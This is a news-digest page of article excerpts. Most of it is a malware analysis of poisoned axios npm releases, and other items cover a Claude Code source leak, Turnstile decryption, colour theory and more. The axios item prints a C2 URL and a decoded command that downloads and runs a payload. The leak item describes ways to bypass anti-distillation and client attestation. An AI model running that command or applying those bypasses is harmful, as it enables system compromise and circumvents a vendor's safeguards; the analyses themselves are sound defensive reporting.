10 interesting stories served every morning and every evening.




1 1,783 shares, 73 trendiness

Malicious Versions Drop Remote Access Trojan

A hijacked maintainer account was used to publish poisoned axios releases, including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity hosted a community town hall on this incident on April 1st at 10:00 AM PT - YouTube recording: https://youtu.be/3Hku_svFvos

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of it published to npm: axios@1.14.1 and axios@0.30.4. Both releases inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control (C2) server and delivers platform-specific second-stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean decoy to evade forensic detection.

If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised.

There are zero lines of malicious code inside axios itself, and that is exactly what makes this attack so dangerous: the entire weapon is the phantom dependency and its postinstall hook.
A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic; it was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. (The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project.) The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community-tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do

Watch the StepSecurity community briefing on the axios supply chain attack. We walk through the full attack chain, indicators of compromise, and remediation steps, and answer community questions.

Watch the recording on YouTube →

The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid "brand-new package" alarms from security scanners:

plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, with no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear to come from a zero-history account during later inspection.

plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The "postinstall": "node setup.js" hook and obfuscated dropper are introduced.

axios@1.14.1 published by the compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.

axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.

npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. The unpublish timestamp is inferred from the axios registry document's modified field (03:15:30Z); npm does not expose a dedicated per-version unpublish timestamp in its public API.

npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.

npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
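The live-window estimates above come from the npm registry's public metadata: every package document exposes a time map with one publish timestamp per version, plus the modified field the inference relies on. A minimal sketch for reading it (the function name is illustrative; requires Node 18+ for the built-in fetch):

```javascript
// Sketch: read per-version publish timestamps from the public npm registry.
// The returned map has ISO timestamps keyed by version, plus "created"
// and "modified".
async function publishTimes(pkg, fetchImpl = fetch) {
  const res = await fetchImpl(`https://registry.npmjs.org/${encodeURIComponent(pkg)}`);
  if (!res.ok) throw new Error(`registry returned ${res.status} for ${pkg}`);
  const doc = await res.json();
  return doc.time;
}

// Example: publishTimes("axios").then((t) => console.log(t.modified));
```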

The attacker compromised the jasonsaayman npm account, which belongs to the primary maintainer of the axios project. The account's registered email was changed to ifstap@proton.me, an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm's OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token, with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE

"_npmUser": {
  "name": "GitHub Actions",
  "email": "npm-oidc-no-reply@github.com",
  "trustedPublisher": {
    "id": "github",
    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
  }
}

// axios@1.14.1 — MALICIOUS
"_npmUser": {
  "name": "jasonsaayman",
  "email": "ifstap@proton.me"
}
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow; it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from the account nrwise@proton.me. This package:

Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository

Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install

Pre-stages a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history: a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:

The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

// Contents of package.md (the clean replacement stub)
{
  "name": "plain-crypto-js",
  "version": "4.2.0",   // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
  "description": "JavaScript library of crypto standards.",
  "license": "MIT",
  "author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
  "homepage": "http://github.com/brix/crypto-js",
  "repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
  "main": "index.js",
  // No "scripts" key — no postinstall, no test
  "dependencies": {}
}

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0, because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

# What npm list reports POST-infection (after the package.json swap):

$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0   # ← reports 4.2.0, not 4.2.1
                            # but the dropper already ran as 4.2.1

# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

"name": "crypto-js",
"version": "4.2.0",
"description": "JavaScript library of crypto standards.",
"author": "Evan Vosberg",
"homepage": "http://github.com/brix/crypto-js",
"scripts": {
  "test": "grunt"   // ← no postinstall
}

// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
"name": "plain-crypto-js",   // ← different name, everything else cloned
"version": "4.2.1",          // ← version one ahead of the real package
"description": "JavaScript library of crypto standards.",
"author": { "name": "Evan Vosberg" },   // ← fraudulent use of real author name
"homepage": "http://github.com/brix/crypto-js",   // ← real repo, wrong package
"scripts": {
  "test": "grunt",
  "postinstall": "node setup.js"   // ← THE ONLY DIFFERENCE. The entire weapon.
}

The attacker published axios@1.14.1 and axios@0.30.4 with "plain-crypto-js": "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js's postinstall script, launching the dropper.

Phantom dependency: a grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()'d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)

DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)

# --- axios/package.json (1.14.0)

# +++ axios/package.json (1.14.1)
-   "version": "1.14.0",
+   "version": "1.14.1",
    "scripts": {
      "fix": "eslint --fix lib/**/*.js",
-     "prepare": "husky"
    "dependencies": {
      "follow-redirects": "^2.1.0",
      "form-data": "^4.0.1",
      "proxy-from-env": "^2.1.0",
+     "plain-crypto-js": "^4.2.1"
    }

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

# --- axios/package.json (0.30.3)

# +++ axios/package.json (0.30.4)
-   "version": "0.30.3",
+   "version": "0.30.4",
    "dependencies": {
      "follow-redirects": "^1.15.4",
      "form-data": "^4.0.4",
      "proxy-from-env": "^1.1.0",
+     "plain-crypto-js": "^4.2.1"
    }

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers. All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript's Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:

charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper's entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0]  → "child_process"   // shell execution

stq[1]  → "os"              // platform detection
stq[2]  → "fs"              // filesystem operations
stq[3]  → "http://sfrclak.com:8000/"   // C2 base URL
stq[5]  → "win32"           // Windows platform identifier
stq[6]  → "darwin"          // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json"    // deleted after execution
stq[14] → "package.md"      // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"

This is the complete attack path from npm install to C2 contact and cleanup, across all three target platforms. With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

// setup.js — de-obfuscated and annotated

// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...
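The two decode layers described above are simple enough to reconstruct and experiment with. The following is a sketch built from the published analysis, not the attacker's original setup.js (the function names _trans_1/_trans_2 come from the write-up; the per-character loop is ours):

```javascript
// Number() on the letters of "OrDeR_7077" yields NaN, which bitwise ops
// coerce to 0, so the effective key is [0,0,0,0,0,0,7,0,7,7].
const KEY = [..."OrDeR_7077"].map((c) => Number(c) | 0);

// Layer 1: positional XOR cipher (involutive: applying it twice is a no-op).
function _trans_1(x) {
  let out = "";
  for (let r = 0; r < x.length; r++) {
    out += String.fromCharCode(x.charCodeAt(r) ^ KEY[(7 * r * r) % 10] ^ 333);
  }
  return out;
}

// Layer 2: reverse the string, restore base64 padding ("_" -> "="),
// base64-decode the bytes as UTF-8, then feed the result through layer 1.
function _trans_2(x) {
  const b64 = [...x].reverse().join("").replace(/_/g, "=");
  return _trans_1(Buffer.from(b64, "base64").toString("utf8"));
}
```

Because the XOR layer is its own inverse, producing an encoded stq[] entry is just _trans_1 followed by base64 encoding, underscore substitution, and reversal.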

Read the original on www.stepsecurity.io »

2 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team member summoned Copilot to correct a typo in a PR of mine, Copilot edited my PR description to include an ad for itself and Raycast.

This is horrific. I knew this kind of bullshit would happen eventually, but I didn't expect it so soon.

Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die.

...

Read the original on notes.zachmanson.com »

3 1,318 shares, 54 trendiness

fake tools, frustration regexes, undercover mode, and more

Update: see HN discussions about this post: https://news.ycombinator.com/item?id=47586778

I use Claude Code daily, so when Chaofan Shou noticed earlier today that Anthropic had shipped a .map file alongside their Claude Code npm package, one containing the full, readable source code of the CLI tool, I immediately wanted to look inside. The package has since been pulled, but not before the code was widely mirrored (including by me) and picked apart on Hacker News.

This is Anthropic's second accidental exposure in a week (the model spec leak was just days ago), and some people on Twitter are starting to wonder if someone inside is doing this on purpose. Probably not, but it's a bad look either way. The timing is hard to ignore: just ten days ago, Anthropic sent legal threats to OpenCode, forcing them to remove built-in Claude authentication because third-party tools were using Claude Code's internal APIs to access Opus at subscription rates instead of pay-per-token pricing. That whole saga makes some of the findings below more pointed.

So I spent my morning reading through the HN comments and leaked source. Here's what I found, roughly ordered by how "spicy" I thought it was.

In claude.ts (lines 301–313), there's a flag called ANTI_DISTILLATION_CC. When enabled, Claude Code sends anti_distillation: ['fake_tools'] in its API requests. This tells the server to silently inject decoy tool definitions into the system prompt.

The idea: if someone is recording Claude Code's API traffic to train a competing model, the fake tools pollute that training data. It's gated behind a GrowthBook feature flag (tengu_anti_distill_fake_tool_injection) and only active for first-party CLI sessions.

This was one of the first things people noticed on HN.

There's also a second anti-distillation mechanism in betas.ts (lines 279–298): server-side connector-text summarization. When enabled, the API buffers the assistant's text between tool calls, summarizes it, and returns the summary with a cryptographic signature. On subsequent turns, the original text can be restored from the signature. If you're recording API traffic, you only get the summaries, not the full reasoning chain.

How hard would it be to work around these? Not very. Looking at the activation logic in claude.ts, the fake tools injection requires all four conditions to be true: the ANTI_DISTILLATION_CC compile-time flag, the cli entrypoint, a first-party API provider, and the tengu_anti_distill_fake_tool_injection GrowthBook flag returning true. A MITM proxy that strips the anti_distillation field from request bodies before they reach the API would bypass it entirely, since the injection is server-side and opt-in. The shouldIncludeFirstPartyOnlyBetas() function also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so setting that env var to a truthy value disables the whole thing. And if you're using a third-party API provider or the SDK entrypoint instead of the CLI, the check never fires at all. The connector-text summarization is even more narrowly scoped: it's Anthropic-internal-only (USER_TYPE === 'ant'), so external users won't encounter it regardless.

Anyone serious about distilling from Claude Code traffic would find the workarounds in about an hour of reading the source. The real protection is probably legal, not technical.

The file undercover.ts (about 90 lines) implements a mode that strips all traces of Anthropic internals when Claude Code is used in non-internal repos. It instructs the model to never mention internal codenames like "Capybara" or "Tengu," internal Slack channels, repo names, or the phrase "Claude Code" itself.

"There is NO force-OFF. This guards against model codename leaks."

You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there's no way to force it off. In external builds, the entire function gets dead-code-eliminated to trivial returns. This is a one-way door.

This means AI-authored commits and PRs from Anthropic employees in open source projects will have no indication that an AI wrote them. Hiding internal codenames is reasonable. Having the AI actively pretend to be human is a different thing.

An LLM company using regexes for sentiment analysis is peak irony, but also: a regex is faster and cheaper than an LLM inference call just to check if someone is swearing at your tool.

In system.ts (lines 59–95), API requests include a cch=00000 placeholder. Before the request leaves the process, Bun's native HTTP stack (written in Zig) overwrites those five zeros with a computed hash. The server then validates the hash to confirm the request came from a real Claude Code binary, not a spoofed one.

They use a placeholder of the same length so the replacement doesn't change the Content-Length header or require buffer reallocation. The computation happens below the JavaScript runtime, so it's invisible to anything running in the JS layer. It's basically DRM for API calls, implemented at the HTTP transport level.
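The same-length trick is easy to illustrate. This hypothetical helper is ours, purely for demonstration; in the real client the substitution happens in Bun's native Zig code, below the JS layer:

```javascript
// Replacing a fixed-length placeholder in a serialized body keeps the byte
// count identical, so Content-Length needs no rewrite and the buffer needs
// no reallocation.
function stampAttestation(body, hash) {
  const PLACEHOLDER = "cch=00000";
  const stamp = "cch=" + hash.slice(0, 5); // five hash chars replace five zeros
  if (stamp.length !== PLACEHOLDER.length) throw new Error("length mismatch");
  return body.replace(PLACEHOLDER, stamp);
}

const before = "x-anthropic-billing-header: entrypoint=cli;cch=00000";
const after = stampAttestation(before, "9f2c41ab");
// after has exactly the same length as before
```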

This is the technical enforcement behind the OpenCode legal fight. Anthropic doesn't just ask third-party tools not to use their APIs; the binary itself cryptographically proves it's the real Claude Code client. If you're wondering why the OpenCode community had to resort to session-stitching hacks and auth plugins after Anthropic's legal notice, this is why.

The attestation isn't airtight, though. The whole mechanism is gated behind a compile-time feature flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 placeholder only gets injected into the x-anthropic-billing-header when that flag is on. The header itself can be disabled entirely by setting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or remotely via a GrowthBook killswitch (tengu_attribution_header). The Zig-level hash replacement also only works inside the official Bun binary. If you rebuilt the JS bundle and ran it on stock Bun (or Node), the placeholder would survive as-is: five literal zeros hitting the server. Whether the server rejects that outright or just logs it is an open question, but the code comment references a server-side _parse_cc_header function that "tolerates unknown extra fields," which suggests the validation might be more forgiving than you'd expect for a DRM-like system. Not a push-button bypass, but not the kind of thing that would stop a determined third-party client for long either.

"BQ 2026-03-10: 1,279 sessions had 50+ consecutive failures (up to 3,272) in a single session, wasting ~250K API calls/day globally."

The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 consecutive failures, compaction is disabled for the rest of the session. Three lines of code to stop burning a quarter million API calls a day.
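A guard like that really is only a few lines. Here is an illustrative sketch (the constant name comes from the leak; the surrounding code is ours, not Anthropic's):

```javascript
// Circuit breaker: after N consecutive compaction failures, stop trying
// for the remainder of the session.
const MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3;

function makeAutocompactGuard() {
  let consecutiveFailures = 0;
  let disabled = false;
  return {
    recordResult(ok) {
      if (ok) { consecutiveFailures = 0; return; } // any success resets the count
      consecutiveFailures += 1;
      if (consecutiveFailures >= MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES) {
        disabled = true; // compaction off for the rest of the session
      }
    },
    shouldAttempt() { return !disabled; },
  };
}
```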

Throughout the codebase, there are references to a feature-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an unreleased autonomous agent mode that includes:

This is probably the biggest product roadmap reveal from the leak.

The implementation is heavily gated, so who knows how far along it is. But the scaffolding for an always-on, background-running agent is there.

Tomorrow is April 1st, and the source contains what's almost certainly this year's April Fools' joke: buddy/companion.ts implements a Tamagotchi-style companion system. Every user gets a deterministic creature (18 species, rarity tiers from common to legendary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) generated from their user ID via a Mulberry32 PRNG. Species names are encoded with String.fromCharCode() to dodge build-system grep checks.

The terminal rendering in ink/screen.ts and ink/optimizer.ts borrows game-engine techniques: an Int32Array-backed ASCII char pool, bitmask-encoded style metadata, a patch optimizer that merges cursor moves and cancels hide/show pairs, and a self-evicting line-width cache (the source claims a "~50x reduction in stringWidth calls during token streaming"). Seems like overkill until you remember these things stream tokens one at a time.

Every bash command runs through 23 numbered security checks in bashSecurity.ts: 18 blocked Zsh builtins, defense against Zsh equals expansion (=curl bypassing permission checks for curl), unicode zero-width space injection, IFS null-byte injection, and a malformed token bypass found during HackerOne review. I haven't seen another tool with this specific a Zsh threat model.

Prompt cache economics clearly drive a lot of the architecture. promptCacheBreakDetection.ts tracks 14 cache-break vectors, and there are "sticky latches" that prevent mode toggles from busting the cache. One function is annotated DANGEROUS_uncachedSystemPromptSection(). When you're paying for every token, cache invalidation stops being a computer science joke and becomes an accounting problem.

The multi-agent coordinator in coordinatorMode.ts is interesting because the orchestration algorithm is a prompt, not code. It manages worker agents through system prompt instructions like "Do not rubber-stamp weak work" and "You must understand findings before directing follow-up work. Never hand off understanding to another worker."

The codebase also has some rough spots. print.ts is 5,594 lines long, with a single function spanning 3,167 lines and 12 levels of nesting. They use Axios for HTTP, which is funny timing given that Axios was just compromised on npm with malicious versions dropping a remote access trojan.

Some people are downplaying this because Google's Gemini CLI and OpenAI's Codex are already open source. But those companies open-sourced their agent SDK (a toolkit), not the full internal wiring of their flagship product.

The real damage isn't the code. It's the feature flags. KAIROS, the anti-distillation mechanisms: these are product roadmap details that competitors can now see and react to. The code can be refactored. The strategic surprise can't be un-leaked.

And here's the kicker: Anthropic acquired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, reports that source maps are served in production mode even though Bun's own docs say they should be disabled. The issue is still open. If that's what caused the leak, then Anthropic's own toolchain shipped a known bug that exposed their own product's source code.

As one Twitter reply put it: "accidentally shipping your source map to npm is the kind of mistake that sounds impossible until you remember that a significant portion of the codebase was probably written by the AI you are shipping."

...

Read the original on alex000kim.com »

4 1,279 shares, 49 trendiness

Cancer

I've taken agency in the treatment of my bone cancer (osteosarcoma in the T5 vertebra of the upper spine). After I ran out of standard-of-care treatment options and there were no trials available for me, I started doing maximum diagnostics, created new treatments, began doing treatments in parallel, and started scaling this for others.

Elliot Hershberg wrote a great and extensive article about my cancer journey.

My cancer journey deck is embedded below, and there is also a recording of an OpenAI Forum presentation. The companies we are building to scale this approach for others can be found at evenone.ventures. Please scroll further on this page for my data and other information.

I think the medical industry can be more patient-first; see this great article by Ruxandra: https://www.writingruxandrabio.com/p/the-bureaucracy-blocking-the-chance

For my data, please see https://osteosarc.com/, which includes my treatment timeline and a data overview doc with 25TB of publicly readable Google Cloud buckets.

Please subscribe to my mailing list

...

Read the original on sytse.com »

5 1,025 shares, 52 trendiness

Claude Code Unpacked

Stuff that's in the code but not shipped yet. Feature-flagged, env-gated, or just commented out.

A virtual pet that lives in your terminal. Species and rarity are derived from your account ID. Persistent mode with memory consolidation between sessions and autonomous background actions.

Long planning sessions on Opus-class models, up to 30-minute execution windows.

Control Claude Code from your phone or a browser. Full remote session with permission approvals.

Run sessions in the background with --bg / tmux.

Sessions talk to each other over Unix domain sockets.

Between sessions, the AI reviews what happened and organizes what it learned.

...

Read the original on ccunpacked.dev »

6 964 shares, 39 trendiness

Why So Many Control Rooms Were Seafoam Green

Hello! This is a long, hopefully fun one! If you’re reading this in your email, you may need to click “expand” to read all the way to the end of this post. Thank you!

When I lived in Nashville, my girlfriends and I would take ourselves on “field trips” across the state. We once went on a tour to spot bald eagles in West Tennessee, and upon arrival, a woman with fluffy hair in the state park bathroom told us she had seen 113 bald eagles the day before. We ended up seeing (counts on one hand)…2.

In the summer of 2017, we went on another field trip to the National Park’s Manhattan Project Site in Oak Ridge, TN. In 1942, Oak Ridge, TN, was chosen as the site for a plutonium and uranium enrichment plant as part of the Manhattan Project, a top-secret WWII effort to develop the first atomic bomb. Once a small and rural farming community settled in the valley of East Tennessee, the swift task to create a nuclear bomb grew the secret settlement titled “Site X” from 3,000 people in 1942 to 75,000 by 1945. Alongside the population growth, enormously complex buildings were built.

A Note: The Manhattan Project created the nuclear bomb that caused extreme devastation in Japan and ended the war. There’s a lot of U.S. history that’s awful and indefensible. Today, though, I’d like to talk about the industrial design and color theory from that era.

Our first stop on the tour was the X-10 Graphite Reactor room and its control panel room. The X-10 Graphite Reactor, a 24-foot-square block of graphite, was the world’s second full-scale nuclear reactor. The plutonium produced from uranium there was shipped to Los Alamos, New Mexico, for research into the atomic bomb Fat Man.

What caught my eye as a designer, as with most industrial plants and control rooms of that time, besides the knobs, levers, and buttons, was the use of a very specific seafoam green, seen here on the reactor’s walls and in the control panel room.

Thus began my day-long search, traipsing through the internet for historical information about this specific shade of seafoam green.

Thankfully, this path led me to the work of color theorist Faber Birren.

In the fall of 1919, Faber Birren entered the Art Institute at the University of Chicago, only to drop out in the spring of 1921 to commit himself to self-education in color, as no such program existed. He spent his days interviewing psychologists and physicists and conducted his own color studies, which were considered unconventional at the time. He painted his bedroom walls red vermillion to test if it would make him go mad.

In 1933, he moved to New York City and became a self-appointed color consultant, approaching major corporations to sell the idea that appropriate use of color could boost sales. He convinced a Chicago wholesale meat company that the company’s white walls made the meat unappealing. He studied the steaks on various colored backgrounds and determined that a blue/green background would make the beef appear redder. Sales went up, and soon a number of industries hired Faber to bring color theory into their work, including DuPont, the leading chemical and wartime contract company and the Manhattan Project’s building designer.

With the increase in wartime production in the US during WWII, Birren and DuPont created a master color safety code for the industrial plant industry, with the aim of reducing accidents and increasing efficiency within plants. These color codes were approved by the National Safety Council in 1944 and are now internationally recognized, having been mandatory practice since 1948. The color coding went as such:

* Fire Red: All fire protection, emergency stop buttons, and flammable liquids should be red

* Solar Yellow: Signifies caution and physical hazards such as falling

* Safety Green: Indicates safety features such as first-aid equipment, emergency exits, and eyewash stations

* Light Green: Used on walls to reduce visual fatigue

My industrial “seafoam” light green mystery has finally been solved thanks to this article from UChicago Magazine.

Keeping in theme with “control rooms,” I researched the second Manhattan Project plant, the Hanford Site, home to the B Reactor, the first full-scale plutonium production reactor in the world. To my surprise, this site looked like an ode to Birren’s light green and color codes, which makes sense, since his client, DuPont, was also responsible for the design and construction of Hanford.

In Birren’s 1963 book Color for Interiors: Historical and Modern, he writes about research undertaken to measure eye fatigue in the industrial workplace and the effects of interior color on human efficiency and well-being. Using the color chart above, he states that the proper use of color hues can reduce accidents, raise standards of machine maintenance, and improve labor morale.

“The importance of color in factories is first to control brightness in the general field of view for an efficient seeing condition. Interiors can then be conditioned for emotional pleasure and interest, using warm, cool, or luminous hues as working conditions suggest. Color should be functional and not merely decorative.” - Faber Birren

Now, looking at the interiors of the Manhattan Project control rooms and plants, the broad use of Light and Medium Green makes sense. One mistake and mass devastation could have occurred within these towns. Birren writes, “Note that most of the standards are soft in tone. This is deliberate and intended to establish a non-distracting environment. Green is a restful and natural-looking color for average factory interiors. Light Green with Medium Green is suggested.”

Let’s put these theories to work with this photo of the B Reactor room found at the Hanford Site of the Manhattan Project. In Birren’s book, he directed the following color applications for small industrial areas:

* ✔️ Medium Gray is proposed for machinery, equipment, and racks

* ✔️ Beige walls may be applied to interiors deprived of natural light

As we can see, his color theory was followed to a T.

Other US Industrial Plants that Used these Color Methods

This color theory research just opened a whole can of design worms for me, and I’m excited to dive into them more. For example, Germany developed its own seafoam green, specifically designed for bridges, called Cologne Bridge Green. That’s a post for another day.

And finally, if you enjoy this sort of design, I designed a font called “Parts List” that is meant to evoke the feeling of sitting in an oil change waiting room, with the smell of burnt coffee. I created this font out of old auto parts lists, and it’s a perfectly wobbly typeface that will give you that “Is it a typewriter or handwriting?” feeling. It’s now available on my website.

PS: I have an old friend whose dad still works at the Uranium plant in Oak Ridge. I told him that I was surprised that almost all of the facilities had been torn down, and he just looked at me straight in the face and said, “Who said it’s actually gone?” Noted. ✌️

Thanks for being here!

...

Read the original on bethmathews.substack.com »

7 927 shares, 37 trendiness

ChatGPT Won't Let You Type Until Cloudflare Reads Your React State. I Decrypted the Program That Does It.

Every ChatGPT message triggers a Cloudflare Turnstile program that runs silently in your browser. I decrypted 377 of these programs from network traffic and found something that goes beyond standard browser fingerprinting.

The program checks 55 properties spanning three layers: your browser (GPU, screen, fonts), the Cloudflare network (your city, your IP, your region from edge headers), and the ChatGPT React application itself (__reactRouterContext, loaderData, clientBootstrap). Turnstile doesn’t just verify that you’re running a real browser. It verifies that you’re running a real browser that has fully booted a specific React application.

A bot that spoofs browser fingerprints but doesn’t render the actual ChatGPT SPA will fail.

The Turnstile bytecode arrives encrypted. The server sends a field called turnstile.dx in the prepare response: 28,000 characters of base64 that change on every request.

The outer layer is XOR’d with the p token from the prepare request. Both travel in the same HTTP exchange, so decrypting it is straightforward:

